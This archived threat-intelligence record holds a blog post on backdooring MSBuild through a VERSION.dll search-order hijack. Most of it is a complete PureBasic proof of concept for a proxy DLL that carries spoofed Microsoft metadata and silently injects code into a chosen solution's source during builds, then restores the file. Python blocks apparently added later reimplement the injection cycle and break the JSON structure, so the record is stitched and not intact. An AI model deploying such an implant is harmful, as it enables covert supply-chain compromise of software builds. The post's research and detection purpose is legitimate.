{
	"id": "c70b3323-c7f9-4d3b-83a2-4934891eaf0f",
	"created_at": "2026-04-06T00:09:38.659508Z",
	"updated_at": "2026-04-10T13:12:41.564733Z",
	"deleted_at": null,
	"sha1_hash": "76b941484ec149fa778b3c57dbb02c4e53c387d9",
	"title": "Backdooring MSBuild",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 220946,
	"plain_text": "Backdooring MSBuild\r\nPublished: 2021-01-17 · Archived: 2026-04-05 15:12:21 UTC\r\nhttps://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html\r\nIn 2020, different United States federal government branches were affected by a massive data breach. One part of these efforts was an attack on SolarWinds and their platform, including the build infrastructure of their flagship product, SolarWinds Orion. On January 11th, 2021, the CrowdStrike Intelligence Team published an analysis of a malicious tool deployed into SolarWinds’ build environment to inject the SUNBURST backdoor into the SolarWinds Orion platform at build time.\r\nThe CrowdStrike blog post was referred to me by a colleague. Initially, I thought it was pretty sloppy of the SUNSPOT developers to search for MSBuild.exe processes every second, then read the virtual memory of these remote processes to determine if the right solution is being built right now. In addition to all this noise, the SUNBURST attackers created a Scheduled Task to start the implant on every boot.\r\nIf one imagines that you are a top-of-the-line attack boutique and have compromised different hard targets, including the build infrastructure, why would you resort to such a crude way to execute that beautiful implanting attack?\r\nSo how could one do better?\r\nMSBuild Revisited\r\nMSBuild, the Microsoft engine for building applications, uses (most of the time) XML files to steer the targeted solution’s build process.\r\nOne of the first things you’ll notice when inspecting the MSBuild.exe binary is that it is itself a .NET Assembly. So what is the best way to backdoor (almost) any .NET Assembly?\r\n… right, using the version.dll trick, i.e. a DLL search-order hijack: a DLL that is neither already loaded nor on the KnownDLLs list is looked up in the application’s own directory before System32, so a version.dll placed next to the executable wins.\r\nAfter running a quick build of an arbitrary solution (e.g. via C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe SomeProject.sln /t:Build /p:Configuration=Release;Platform=Win64 ) and recording a trace with ProcMon, multiple DLLs are searched for (and not found) in the directory of MSBuild.exe:\r\n{\"type\":\"load-not-found-dll\",\"event_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\mscoree.dll\",\"p\r\n{\"type\":\"load-not-found-dll\",\"event_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\ole32.dll\",\"proc\r\n{\"type\":\"load-not-found-dll\",\"event_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\api-ms-win-core-\r\n{\"type\":\"load-not-found-dll\",\"event_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\VERSION.dll\",\"pr\r\n{\"type\":\"load-not-found-dll\",\"event_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\api-ms-win-core-\r\n{\"type\":\"load-not-found-dll\",\"event_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\sxs.dll\",\"proces\r\n{\"type\":\"load-not-found-dll\",\"event_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\WindowsCodecs.dl\r\n{\"type\":\"load-not-found-dll\",\"event_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\VERSION.dll\",\"pr\r\n{\"type\":\"load-not-found-dll\",\"event_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\mscoree.dll\",\"pr\r\nGiven these results, we can target MSBuild.exe or the C# compiler ( Csc.exe , which lives in the same directory and is a .NET assembly as well) directly, depending on our preferences and objectives. 
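As an added example (not code from the original post), here is the same triage automated for a defender or a red teamer: it parses ProcMon-style JSON event lines in the shape quoted above, keeps the DLLs that were probed in the MSBuild directory and not found (each of those names is a hijack candidate), and then checks which of the candidates are now present in that directory. The sample lines are constructed for this example, and the process key is an assumption, since the quoted lines are cut off after it.

```python
import json
import ntpath

# Directory of the MSBuild.exe used in the trace above.
MSBUILD_DIR = 'C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319'


def _event(kind, path, process):
    # Builds one ProcMon-style JSON line in the shape of the quoted trace.
    # The 'process' key is an assumption: the quoted lines are cut off after 'p'.
    return json.dumps({'type': kind, 'event_path': path, 'process': process})


# Constructed sample trace (not a real capture): the probes MSBuild.exe makes in
# its own directory, one probe elsewhere, one non-load event and one csc.exe probe.
SAMPLE_LINES = [
    _event('load-not-found-dll', MSBUILD_DIR + '\\mscoree.dll', 'MSBuild.exe'),
    _event('load-not-found-dll', MSBUILD_DIR + '\\VERSION.dll', 'MSBuild.exe'),
    _event('load-not-found-dll', MSBUILD_DIR + '\\sxs.dll', 'MSBuild.exe'),
    _event('load-not-found-dll', MSBUILD_DIR + '\\VERSION.dll', 'MSBuild.exe'),
    _event('load-not-found-dll', 'C:\\Windows\\System32\\whatever.dll', 'MSBuild.exe'),
    _event('create-file', MSBUILD_DIR + '\\MSBuild.exe.config', 'MSBuild.exe'),
    _event('load-not-found-dll', MSBUILD_DIR + '\\VERSION.dll', 'csc.exe'),
]


def hijack_candidates(lines, app_dir):
    # Returns {process: [dll names]} for every DLL the loader looked for in
    # app_dir without finding it: each of those names can be planted there.
    # Comparison is case-insensitive and tolerates forward slashes (ntpath.normcase).
    wanted = ntpath.normcase(app_dir.rstrip('\\'))
    found = {}
    for line in lines:
        ev = json.loads(line)
        if ev.get('type') != 'load-not-found-dll':
            continue
        path = ev['event_path']
        if ntpath.normcase(ntpath.dirname(path)) != wanted:
            continue
        found.setdefault(ev['process'], set()).add(ntpath.basename(path).lower())
    return {proc: sorted(names) for proc, names in found.items()}


def planted_dlls(candidates, present_files):
    # Candidate names that now exist in the directory. The real version.dll
    # lives in System32, so a hit for it here is a planted proxy until proven
    # otherwise: check the Authenticode signature and hash of that file.
    present = {name.lower() for name in present_files}
    return sorted(name for name in candidates if name in present)


if __name__ == '__main__':
    cands = hijack_candidates(SAMPLE_LINES, MSBUILD_DIR)
    print(cands)
    # On a real host replace this constructed listing with os.listdir(MSBUILD_DIR).
    print(planted_dlls(cands['MSBuild.exe'], ['MSBuild.exe', 'Version.dll']))
```

On a live system the listing passed to planted_dlls comes from the MSBuild directory itself; every name it returns should have its signature verified, since none of the probed DLLs legitimately ships in that directory.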
As CrowdStrike mentioned, the implant checked for the right solution being built, so we will also target MSBuild.exe in our tests.\r\nVERSION.dll Structure\r\nFor our purposes, it is enough to know that VERSION.dll exports 17 names, all of which we need to implement (or forward to the real DLL) to ensure the target’s functionality is not impaired:\r\n__export_name(GetFileVersionInfoA)\r\n__export_name(GetFileVersionInfoByHandle)\r\n__export_name(GetFileVersionInfoExA)\r\n__export_name(GetFileVersionInfoExW)\r\n__export_name(GetFileVersionInfoSizeA)\r\n__export_name(GetFileVersionInfoSizeExA)\r\n__export_name(GetFileVersionInfoSizeExW)\r\n__export_name(GetFileVersionInfoSizeW)\r\n__export_name(GetFileVersionInfoW)\r\n__export_name(VerFindFileA)\r\n__export_name(VerFindFileW)\r\n__export_name(VerInstallFileA)\r\n__export_name(VerInstallFileW)\r\n__export_name(VerLanguageNameA)\r\n__export_name(VerLanguageNameW)\r\n__export_name(VerQueryValueA)\r\n__export_name(VerQueryValueW)\r\nProof of Concept (PoC)\r\nThe following section describes a crude PoC that implements the backdoor functionality in a DLL, without the need for reading remote process memory or triggering a process search every second.\r\nThe PoC is written in PureBasic, as no sane attacker will implement an implant in it, so copy-pasting of this source is not a concern ;-)\r\nObjectives\r\nThe implant should have the following characteristics:\r\nno additional running processes\r\nno remote process actions (reading/writing remote process memory, etc.)\r\nonly trigger when the right solution is being built\r\ninsertion of the backdoor into the source during the build process\r\nremoval of the backdoor from the source file (restoring the original) after the build process\r\nImplementation\r\nAs we saw earlier, the VERSION.dll file is loaded very early by the .NET runtime. 
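The objectives listed above, taken on their own as an added example in Python rather than the PoC’s PureBasic (this is not code from the original post): the insert-then-restore step against a constructed Program.cs with the UTF-8 BOM and CRLF line endings Visual Studio writes. It keeps the original bytes in memory, refuses a second activation, leaves a file without the expected anchor untouched, and shows through hashes why inspecting the source tree after the build finds nothing: only the compiled output carries the change. The anchor, the C# payload and the file names are this example’s own.

```python
import codecs
import hashlib
import os
import tempfile

# Constructed stand-ins for the PoC's #BACKDOOR_INSERT_AFTER and #BACKDOOR_CODE.
ANCHOR = b'class Class1 {'
PAYLOAD = b' public Class1() { Console.WriteLine(\"Hello from the Static initializer!\"); }'


def insert_after_anchor(source, anchor, payload):
    # Returns the patched source, or None when the anchor is absent (wrong file
    # or wrong solution): then nothing is written and nothing is remembered.
    pos = source.find(anchor)
    if pos < 0:
        return None
    cut = pos + len(anchor)
    return source[:cut] + payload + source[cut:]


class SourceImplant:
    # Mirrors ActivateBackdoor / CleanupBackdoor: patch once, keep the original
    # bytes in memory, write them back on cleanup. Bytes rather than text, so a
    # BOM and CRLF line endings survive the round trip unchanged.
    def __init__(self, path, anchor=ANCHOR, payload=PAYLOAD):
        self.path = path
        self.anchor = anchor
        self.payload = payload
        self.original = None

    def activate(self):
        if self.original is not None:
            return False  # already active (the PoC's #BACKDOOR_ALIVE check)
        with open(self.path, 'rb') as fh:
            data = fh.read()
        patched = insert_after_anchor(data, self.anchor, self.payload)
        if patched is None:
            return False
        with open(self.path, 'wb') as fh:
            fh.write(patched)
        self.original = data
        return True

    def cleanup(self):
        if self.original is None:
            return False
        with open(self.path, 'wb') as fh:
            fh.write(self.original)
        self.original = None
        return True


def sha256_of(path):
    with open(path, 'rb') as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def run_build_cycle(source_bytes):
    # Simulates one MSBuild run over a temporary Program.cs: activation before
    # the compile, cleanup at DLL_PROCESS_DETACH. Returns what an observer sees.
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, 'Program.cs')
        with open(path, 'wb') as fh:
            fh.write(source_bytes)
        before = sha256_of(path)
        implant = SourceImplant(path)
        activated = implant.activate()
        during = sha256_of(path)
        with open(path, 'rb') as fh:
            patched = fh.read()
        second = implant.activate()
        implant.cleanup()
        after = sha256_of(path)
        return {
            'activated': activated,
            'second_activation': second,
            'payload_present_during_build': PAYLOAD in patched,
            'changed_during_build': before != during,
            'restored': before == after,
        }


# Constructed Program.cs as Visual Studio writes it: UTF-8 BOM and CRLF endings.
SAMPLE_SOURCE = codecs.BOM_UTF8 + (
    b'using System;\r\n'
    b'namespace ConsoleApp1 {\r\n'
    b'  class Class1 {\r\n'
    b'  }\r\n'
    b'}\r\n'
)

if __name__ == '__main__':
    print(run_build_cycle(SAMPLE_SOURCE))
```

The hash-before equals hash-after result is the operational point: a file-integrity check on the source tree that runs after the build sees the untouched file, so the place to look is the compiled assembly, or a snapshot of the source taken while the build is running.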
By implementing mock functions, it is possible to verify that the DLL is not only loaded, but that the function GetFileVersionInfoSizeW is called right before the build process is executed, as shown in the following figure.\r\nGiven that, it is possible to avoid any half-baked solution in the DllMain function, and any problems with the Loader Lock, by simply hijacking the call to GetFileVersionInfoSizeW: executing our backdoor insertion code, then calling the real GetFileVersionInfoSizeW function and returning its result.\r\nIn the PoC presented below, every forwarded export calls ActivateBackdoor() before handing over to the real implementation; in practice the first of these calls MSBuild makes is GetFileVersionInfoSizeW, so that is where the backdoor is inserted. The original source is kept in memory, and as soon as DllMain is called with DLL_PROCESS_DETACH, the backdoor code is removed by restoring the previous source code.\r\nConclusion\r\nTargeting MSBuild directly by copying our VERSION.dll to the MSBuild directory ensures better operational security: no additional processes need to be created, the memory search can be omitted, and every build run by this MSBuild.exe is captured, as our code is executed directly by MSBuild. Two caveats: Visual Studio ships its own MSBuild under its install directory, which would need the same treatment, and the flip side for defenders is that the legitimate version.dll lives only in System32, so a VERSION.dll (or any other DLL the loader probes for, as in the ProcMon trace above) sitting next to MSBuild.exe is a strong indicator of a planted proxy and is worth a signature and hash check.\r\nSource\r\nSource and a compiled binary are available in the blog’s Github repo.\r\n
; ***************************************************************************\r\n; * *\r\n; * Author: marpie (marpie@a12d404.net) *\r\n; * License: BSD 2-clause *\r\n; * Copyright: (c) 2021, a12d404.net *\r\n; * Status: Prototype *\r\n; * Created: 20210116 *\r\n; * Last Update: 20210117 *\r\n; * *\r\n; ***************************************************************************\r\nEnableExplicit\r\n; ---------------------------------------------------------------------------\r\n;- Consts\r\n#TARGET_SOLUTION = \"ConsoleApp1.sln\"\r\n; C# constructor injected right after #BACKDOOR_INSERT_AFTER. The end of this line is cut off in the archived copy; the closing Chr(34) + \"); }\" is reconstructed from the surrounding text.\r\n#BACKDOOR_CODE = \"public Class1() { Console.WriteLine(\" + Chr(34) + \"Hello from the Static initializer!\" + Chr(34) + \"); }\"\r\n#BACKDOOR_INSERT_AFTER = \"class Class1 {\"\r\n#BACKDOOR_ALIVE = $c45c9bda8db1\r\n#MIN_SIZE = 100 ; 100 bytes, smaller files are never touched\r\n; ---------------------------------------------------------------------------\r\n;- Variables\r\nGlobal mux.i = #Null ; set in DLL_PROCESS_ATTACH\r\nGlobal hVersion.i = #Null ; handle of the original version.dll from System32\r\nGlobal active.i = 0 ; checked in CleanupBackdoor\r\nGlobal origContent.s = \"\" ; original source text, kept for the restore on detach\r\nGlobal origContentSize.i = 0 ; length of the original source (characters)\r\n
; ---------------------------------------------------------------------------\r\n;- Backdoor Handling\r\n; Looks for the target solution in MSBuild's command line and derives the\r\n; path of the source file to patch (Program.cs next to the .sln).\r\nProcedure.s GetTargetFilePath()\r\n  Define i.i\r\n  Define path.s\r\n  For i = 0 To CountProgramParameters()-1\r\n    path = ProgramParameter(i)\r\n    If CountString(path, #TARGET_SOLUTION) \u003e 0\r\n      ProcedureReturn GetPathPart(path) + \"Program.cs\"\r\n    EndIf\r\n  Next\r\n  ProcedureReturn \"\"\r\nEndProcedure\r\n; Reads the whole file into origContent (decoded as UTF-8).\r\nProcedure.b ReadOrigContent(hFile.i)\r\n  Define res.b = #False\r\n  Define *mem = #Null\r\n  FileSeek(hFile, 0, #PB_Absolute)\r\n  Define size.i = Lof(hFile)\r\n  If size \u003c #MIN_SIZE\r\n    Goto ReadAllCleanup ; empty or implausibly small file: leave it alone\r\n  EndIf\r\n  *mem = AllocateMemory(size)\r\n  If Not *mem\r\n    Goto ReadAllCleanup\r\n  EndIf\r\n  If ReadData(hFile, *mem, size) \u003c\u003e size\r\n    Goto ReadAllCleanup\r\n  EndIf\r\n  origContent = PeekS(*mem, size, #PB_UTF8)\r\n  origContentSize = Len(origContent)\r\n  res = #True\r\nReadAllCleanup:\r\n  If *mem\r\n    FreeMemory(*mem)\r\n  EndIf\r\n  ProcedureReturn res\r\nEndProcedure\r\n
; InsertBackdoor needs to be called from a procedure holding mux!\r\nProcedure.b InsertBackdoor(path.s)\r\n  Define res.b = #False\r\n  \r\n  Define hFile.i = OpenFile(#PB_Any, path, #PB_File_SharedRead | #PB_UTF8)\r\n  If Not hFile\r\n    ProcedureReturn res\r\n  EndIf\r\n  \r\n  ; read file content\r\n  If Not ReadOrigContent(hFile)\r\n    Goto InsertBackdoorError\r\n  EndIf\r\n  \r\n  ; check if the right code is present\r\n  Define pos.i = FindString(origContent, #BACKDOOR_INSERT_AFTER)-1\r\n  If pos \u003c 0\r\n    Goto InsertBackdoorError\r\n  EndIf\r\n  \r\n  ; revert file to 0\r\n  FileSeek(hFile, 0, #PB_Absolute)\r\n  TruncateFile(hFile)\r\n  \r\n  ; write content till start of backdoor\r\n  Define writeSize.i = pos+Len(#BACKDOOR_INSERT_AFTER)\r\n  Define sizeLeft.i = writeSize\r\n  If WriteString(hFile, Left(origContent, writeSize), #PB_UTF8) = 0\r\n    ; we should add a restore of the original file here\r\n    ; ... depending on the write error ...\r\n    Goto InsertBackdoorError\r\n  EndIf\r\n  \r\n  ; write backdoor\r\n  If WriteString(hFile, #BACKDOOR_CODE, #PB_UTF8) = 0\r\n    ; we should add a restore of the original file here\r\n    ; ... depending on the write error ...\r\n    Goto InsertBackdoorError\r\n  EndIf\r\n  \r\n  ; write rest of file\r\n  writeSize = origContentSize-sizeLeft\r\n  If WriteString(hFile, Right(origContent, writeSize), #PB_UTF8) = 0\r\n    ; we should add a restore of the original file here\r\n    ; ... depending on the write error ...\r\n    Goto InsertBackdoorError\r\n  EndIf\r\n  \r\n  res = #True\r\nInsertBackdoorCleanup:\r\n  CloseFile(hFile)\r\n  ProcedureReturn res\r\nInsertBackdoorError:\r\n  If Len(origContent) \u003e 0\r\n    origContent = \"\"\r\n    origContentSize = 0\r\n  EndIf\r\n  Goto InsertBackdoorCleanup\r\nEndProcedure\r\n
Procedure ActivateBackdoor()\r\n  LockMutex(mux)\r\n  ; check if the backdoor is already alive\r\n  If #BACKDOOR_ALIVE = active\r\n    Goto ActivateBackdoorCleanup\r\n  EndIf\r\n  ; check if we have the right solution\r\n  Define targetFilepath.s = GetTargetFilePath()\r\n  If Len(targetFilepath) \u003c 1\r\n    Goto ActivateBackdoorCleanup\r\n  EndIf\r\n  \r\n  MessageRequester(\"ActivateBackdoor\", \"Hello World from Solution: \" + #CRLF$ + ProgramParameter(0))\r\n  \r\n  ; init backdoor\r\n  If InsertBackdoor(targetFilepath)\r\n    active = #BACKDOOR_ALIVE\r\n    MessageRequester(\"ActivateBackdoor\", \"... backdoor inserted ...\")\r\n  Else\r\n    MessageRequester(\"ActivateBackdoor\", \"... backdooring failed ...\")\r\n  EndIf\r\n  \r\nActivateBackdoorCleanup:\r\n  UnlockMutex(mux)\r\n  ProcedureReturn\r\nEndProcedure\r\nProcedure CleanupBackdoor()\r\n  LockMutex(mux)\r\n  If #BACKDOOR_ALIVE = active\r\n    active = #Null\r\n    ; restore the original source\r\n    If origContentSize \u003c\u003e 0\r\n      Define hFile.i = CreateFile(#PB_Any, GetTargetFilePath(), #PB_UTF8)\r\n      If hFile\r\n        WriteString(hFile, origContent, #PB_UTF8)\r\n        CloseFile(hFile)\r\n      EndIf\r\n      origContent = \"\"\r\n      origContentSize = 0\r\n    EndIf\r\n  EndIf\r\n  UnlockMutex(mux)\r\n  ProcedureReturn\r\nEndProcedure\r\n
; ---------------------------------------------------------------------------\r\n;- DllMain Stuff\r\n; PureBasic calls AttachProcess/DetachProcess from DllMain on\r\n; DLL_PROCESS_ATTACH and DLL_PROCESS_DETACH.\r\nProcedureDLL AttachProcess(Instance)\r\n  mux = CreateMutex()\r\nEndProcedure\r\nProcedureDLL DetachProcess(Instance)\r\n  CleanupBackdoor()\r\n  FreeMutex(mux)\r\nEndProcedure\r\n; ---------------------------------------------------------------------------\r\n;- orig VERSION.dll Stuff\r\n; Loads the real version.dll by its full path, so that the loader does not\r\n; resolve the bare name back to this proxy.\r\nProcedure.i LoadVersionDll()\r\n  Define res.i = #Null\r\n  LockMutex(mux)\r\n  If #Null = hVersion\r\n    Define dllPath.s = GetEnvironmentVariable(\"windir\") + \"\\\\system32\\\\version.dll\"\r\n    hVersion = OpenLibrary(#PB_Any, dllPath)\r\n  EndIf\r\n  res = hVersion\r\n  UnlockMutex(mux)\r\n  ProcedureReturn res\r\nEndProcedure\r\n
; ---------------------------------------------------------------------------\r\n;- Exports\r\n; Every export first gives ActivateBackdoor() a chance to run, then forwards\r\n; to the real implementation and returns its result. The real exports are\r\n; stdcall; on x64 there is only one calling convention, so CallCFunction is\r\n; fine here. This PoC is x64-only (see the IDE options at the end).\r\n; BOOL GetFileVersionInfoA(LPCSTR lptstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData)\r\nProcedureDLL.i GetFileVersionInfoA(a1.i, a2.l, a3.l, a4.i)\r\n  ActivateBackdoor()\r\n  ProcedureReturn CallCFunction(LoadVersionDll(), \"GetFileVersionInfoA\", a1, a2, a3, a4)\r\nEndProcedure\r\n; BOOL GetFileVersionInfoExA(DWORD dwFlags, LPCSTR lpwstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData)\r\nProcedureDLL.i GetFileVersionInfoExA(a1.l, a2.i, a3.l, a4.l, a5.i)\r\n  ActivateBackdoor()\r\n  ProcedureReturn CallCFunction(LoadVersionDll(), \"GetFileVersionInfoExA\", a1, a2, a3, a4, a5)\r\nEndProcedure\r\n; BOOL GetFileVersionInfoExW(DWORD dwFlags, LPCWSTR lpwstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData)\r\nProcedureDLL.i GetFileVersionInfoExW(a1.l, a2.i, a3.l, a4.l, a5.i)\r\n  ActivateBackdoor()\r\n  ProcedureReturn CallCFunction(LoadVersionDll(), \"GetFileVersionInfoExW\", a1, a2, a3, a4, a5)\r\nEndProcedure\r\n; DWORD GetFileVersionInfoSizeA(LPCSTR lptstrFilename, LPDWORD lpdwHandle)\r\nProcedureDLL.i GetFileVersionInfoSizeA(a1.i, a2.i)\r\n  ActivateBackdoor()\r\n  ProcedureReturn CallCFunction(LoadVersionDll(), \"GetFileVersionInfoSizeA\", a1, a2)\r\nEndProcedure\r\n; DWORD GetFileVersionInfoSizeExA(DWORD dwFlags, LPCSTR lpwstrFilename, LPDWORD lpdwHandle)\r\nProcedureDLL.i GetFileVersionInfoSizeExA(a1.l, a2.i, a3.i)\r\n  ActivateBackdoor()\r\n  ProcedureReturn CallCFunction(LoadVersionDll(), \"GetFileVersionInfoSizeExA\", a1, a2, a3)\r\nEndProcedure\r\n; DWORD GetFileVersionInfoSizeExW(DWORD dwFlags, LPCWSTR lpwstrFilename, LPDWORD lpdwHandle)\r\nProcedureDLL.i GetFileVersionInfoSizeExW(a1.l, a2.i, a3.i)\r\n  ActivateBackdoor()\r\n  ProcedureReturn CallCFunction(LoadVersionDll(), \"GetFileVersionInfoSizeExW\", a1, a2, a3)\r\nEndProcedure\r\n; DWORD GetFileVersionInfoSizeW(LPCWSTR lptstrFilename, LPDWORD lpdwHandle)\r\n; This is the export MSBuild calls first, right before the build starts.\r\nProcedureDLL.i GetFileVersionInfoSizeW(a1.i, a2.i)\r\n  ActivateBackdoor()\r\n  ProcedureReturn CallCFunction(LoadVersionDll(), \"GetFileVersionInfoSizeW\", a1, a2)\r\nEndProcedure\r\n; BOOL GetFileVersionInfoW(LPCWSTR lptstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData)\r\nProcedureDLL.i GetFileVersionInfoW(a1.i, a2.l, a3.l, a4.i)\r\n  ActivateBackdoor()\r\n  ProcedureReturn CallCFunction(LoadVersionDll(), \"GetFileVersionInfoW\", a1, a2, a3, a4)\r\nEndProcedure\r\n; undocumented: int hMem, LPCWSTR lpFileName, int v2, int v3\r\nProcedureDLL.i GetFileVersionInfoByHandle(a1.i, a2.i, a3.i, a4.l)\r\n  ActivateBackdoor()\r\n  ProcedureReturn CallCFunction(LoadVersionDll(), \"GetFileVersionInfoByHandle\", a1, a2, a3, a4)\r\nEndProcedure\r\n
; DWORD VerFindFileA(DWORD uFlags, LPCSTR szFileName, LPCSTR szWinDir, LPCSTR szAppDir, LPSTR szCurDir, PUINT puCurDirLen, LPSTR szDestDir, PUINT puDestDirLen)\r\nProcedureDLL.i VerFindFileA(a1.l, a2.i, a3.i, a4.i, a5.i, a6.i, a7.i, a8.i)\r\n  ActivateBackdoor()\r\n  ProcedureReturn CallCFunction(LoadVersionDll(), \"VerFindFileA\", a1, a2, a3, a4, a5, a6, a7, a8)\r\nEndProcedure\r\n; DWORD VerFindFileW(DWORD uFlags, LPCWSTR szFileName, LPCWSTR szWinDir, LPCWSTR szAppDir, LPWSTR szCurDir, PUINT puCurDirLen, LPWSTR szDestDir, PUINT puDestDirLen)\r\nProcedureDLL.i VerFindFileW(a1.l, a2.i, a3.i, a4.i, a5.i, a6.i, a7.i, a8.i)\r\n  ActivateBackdoor()\r\n  ProcedureReturn CallCFunction(LoadVersionDll(), \"VerFindFileW\", a1, a2, a3, a4, a5, a6, a7, a8)\r\nEndProcedure\r\n; DWORD VerInstallFileA(DWORD uFlags, LPCSTR szSrcFileName, LPCSTR szDestFileName, LPCSTR szSrcDir, LPCSTR szDestDir, LPCSTR szCurDir, LPSTR szTmpFile, PUINT puTmpFileLen)\r\nProcedureDLL.i VerInstallFileA(a1.l, a2.i, a3.i, a4.i, a5.i, a6.i, a7.i, a8.i)\r\n  ActivateBackdoor()\r\n  ProcedureReturn CallCFunction(LoadVersionDll(), \"VerInstallFileA\", a1, a2, a3, a4, a5, a6, a7, a8)\r\nEndProcedure\r\n; DWORD VerInstallFileW(DWORD uFlags, LPCWSTR szSrcFileName, LPCWSTR szDestFileName, LPCWSTR szSrcDir, LPCWSTR szDestDir, LPCWSTR szCurDir, LPWSTR szTmpFile, PUINT puTmpFileLen)\r\nProcedureDLL.i VerInstallFileW(a1.l, a2.i, a3.i, a4.i, a5.i, a6.i, a7.i, a8.i)\r\n  ActivateBackdoor()\r\n  ProcedureReturn CallCFunction(LoadVersionDll(), \"VerInstallFileW\", a1, a2, a3, a4, a5, a6, a7, a8)\r\nEndProcedure\r\n; DWORD VerLanguageNameA(DWORD wLang, LPSTR szLang, DWORD cchLang)\r\nProcedureDLL.i VerLanguageNameA(a1.l, a2.i, a3.l)\r\n  ActivateBackdoor()\r\n  ProcedureReturn CallCFunction(LoadVersionDll(), \"VerLanguageNameA\", a1, a2, a3)\r\nEndProcedure\r\n; DWORD VerLanguageNameW(DWORD wLang, LPWSTR szLang, DWORD cchLang)\r\nProcedureDLL.i VerLanguageNameW(a1.l, a2.i, a3.l)\r\n  ActivateBackdoor()\r\n  ProcedureReturn CallCFunction(LoadVersionDll(), \"VerLanguageNameW\", a1, a2, a3)\r\nEndProcedure\r\n; BOOL VerQueryValueA(LPCVOID pBlock, LPCSTR lpSubBlock, LPVOID *lplpBuffer, PUINT puLen)\r\n; puLen is a pointer and is declared .i; a .l parameter would truncate a 64-bit pointer\r\nProcedureDLL.i VerQueryValueA(a1.i, a2.i, a3.i, a4.i)\r\n  ActivateBackdoor()\r\n  ProcedureReturn CallCFunction(LoadVersionDll(), \"VerQueryValueA\", a1, a2, a3, a4)\r\nEndProcedure\r\n; BOOL VerQueryValueW(LPCVOID pBlock, LPCWSTR lpSubBlock, LPVOID *lplpBuffer, PUINT puLen)\r\nProcedureDLL.i VerQueryValueW(a1.i, a2.i, a3.i, a4.i)\r\n  ActivateBackdoor()\r\n  ProcedureReturn CallCFunction(LoadVersionDll(), \"VerQueryValueW\", a1, a2, a3, a4)\r\nEndProcedure\r\n
; ---------------------------------------------------------------------------\r\n; IDE Options = PureBasic 5.73 LTS (Windows - x64)\r\n; ExecutableFormat = Shared dll\r\n; CursorPosition = 85\r\n; FirstLine = 60\r\n; Folding = -----\r\n; Executable = version.dll\r\n; CompileSourceDirectory\r\n; EnablePurifier\r\n; IncludeVersionInfo\r\n; VersionField2 = Microsoft Corporation\r\n; VersionField3 = Microsoft® Windows® Operating System\r\n; VersionField5 = 10.0.20190.1000 (WinBuild.160101.0800)\r\n; VersionField6 = Version Checking and File Installation Libraries\r\n; VersionField7 = version\r\n; VersionField8 = VERSION.DLL\r\n; VersionField9 = © Microsoft Corporation. All rights reserved.\r\n; VersionField15 = VOS_NT\r\n; VersionField16 = VFT_DLL\r\nSource: https://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html"
	],
	"report_names": [
		"msbuild-backdoor.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434178,
	"ts_updated_at": 1775826761,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/76b941484ec149fa778b3c57dbb02c4e53c387d9.pdf",
		"text": "https://archive.orkl.eu/76b941484ec149fa778b3c57dbb02c4e53c387d9.txt",
		"img": "https://archive.orkl.eu/76b941484ec149fa778b3c57dbb02c4e53c387d9.jpg"
	}
}